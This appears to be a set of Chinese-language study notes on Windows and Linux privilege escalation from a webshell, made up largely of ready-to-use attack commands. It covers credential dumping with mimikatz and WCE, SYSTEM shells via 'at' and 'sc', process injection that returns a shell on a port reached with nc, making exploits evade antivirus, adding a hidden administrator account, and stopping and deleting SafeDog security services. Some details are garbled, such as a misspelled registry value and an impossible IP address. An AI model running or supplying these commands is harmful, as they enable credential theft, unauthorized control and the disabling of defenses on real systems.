提权学习
提权前提
:
1.拥有普通用户权限
2.拥有网站webshell
3.存在提权漏洞
信息收集
命令行
查看远程控制是否开启:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDebyTSConnections
查看portnumber开启的端口:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
检索敏感文件:
dir /b /s *.txt
收集可利用poc:多关注新漏洞和已知漏洞,收集脚本,方便利用
漏洞分析工具
Windows_Exploit_Suggester
:通过下载微软公开漏洞库到本地“生成日期+mssb.xls”文件,
然后根据操作系统版本,跟systeminfo生成的文件进行比对,从而发现系统是否存在未修复漏洞。
//下载漏洞库
windows-exploit-suggester.py –update
//靶机生成系统信息文件
systeminfo > win10.txt
//查看系统漏洞
windows-exploit-suggester.py --database 2018-08-11-mssb.xls --systeminfo win10.txt
Linux_Exploit_Suggester
:根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。
//查看内核信息
uname -a-
//检测漏洞
./Linux_Exploit_Suggester.pl
//指定版本检测漏洞
./Linux_Exploit_Suggester.pl -k 2.6.28
获取密码工具
minikatz
:抓取密码
//提取权限
privilege::debug
//抓取密码
sekurlsa::logonpasswords
WCE
:抓取密码
//查看当前登录的用户及加密的密码
wce-universal.exe -l
//查看当前用户登录的详细信息
wce-universal.exe -lv
//删除一个指定会话的luid
wce-universal.exe -d ID号
//刷新会话信息
wce-universal.exe -e(手动更新)
//拼接会话信息,拼接会话信息可以隐藏用户身份和信息
wce-universal.exe -i ID号 -s 用户信息
//生成指定字符串的lmhash和ntlmhash
wce-universal.exe -g 明文密码
//查看明文信息
wce-universal -w
系统提权
提权工具
at命令
:Windows XP中内置的命令
at+时间+/interaction cmd
sc命令
:XP系统中功能强大的DOS命令
//创建super进程
sc Creat Super binPath="cmd /K start" type=own type=interact
//启动
sc start Super
pin.jector.exe
:注入进程
//查看可注入进程
pin.jector.exe -l
//注入pid为600进程,使用端口2345返回cmd
pin.jector.exe -p 600 cmd 2345
//监听注入的进程
nc -nv 192.268.1.57 2345
Windows提权
提权准备
:
使用 Windows-Exploit-Suggester获取目前系统中可能存在的漏洞,步骤如下。
① 收集并编译相关POC。
② 若操作系统中安装了杀毒软件及安全防护软件,则需要对提权 POC 进行免杀,否则直接 进行下一步。
③ 上传POC。
④ 由WebShell或者反弹WebShell来执行命令。
⑤ 搜索漏洞,根据关键字进行搜索
例如MS10-061。
● 在百度浏览器中搜索“MS10-061 site:exploit-db.com”。
● 访问packetstormsecurity网站进行搜索(https://packetstormsecurity.com/search/? q=MS16-016)。
● 安全焦点的BugTraq是一个出色的漏洞和Exploit数据源,可以通过CVE编号或者产品信息漏洞直接搜索,网址为http://www.securityfocus.com/bid。
MSF搜索可利用poc
:
(1)搜索POC 在Kali中打开MSF或者执行“/usr/bin/msfconsole”命令,在命令提示符下使用search ms+年份后两位
//搜索2018年Windows下所有可用exploit
search ms18
(2)查看相关漏洞情况
可以通过微软官方网站查看漏洞所对应的版本
利用方式 :“https://technet.microsoft.com/library/security/漏洞号”
例如查看 MS08-068的网页,打开方式为“https://technet.microsoft.com/library/security/ms08-068”。
如果显 示为“严重”,则表明可以被利用。
实施提权
:
可以通过执行命令进行提权
//直接执行木马
poc.exe ma.exe
//添加用户
poc.exe "net user antian365 lqaz2wsx /add"
poc.exe "net user localgroup administrators antian365 /add"
//获取明文密码或者哈希值
poc.exe "wce32.exe" -w
poc.exe "wce64.exe" -w
poc.exe "wce32"
停用安全狗
:
停用安全狗的相关服务:
net stop "Safedog Guard Center" /y
net stop "Safedog Update Center" /y
net stop "SafeDogCloudHelper" /y
删除SafeDogGuardCenter服务:
sc stop "SafeDogGuardCenter"
sC config "SafeDogGuardCenter" start= disabled
sC delete "SafeDogGuardCenter"
sC stop "Sa feDogUpdateCenter"
sC config "SafeDogUpdateCenter" start= disabled
sC delete "SafeDogUpdateCenter"
sc stop "SafeDogCloudHelper”
sC config "SafeDogCloudHelper" start= disabled
sC delete "Sa feDogCloudHelper"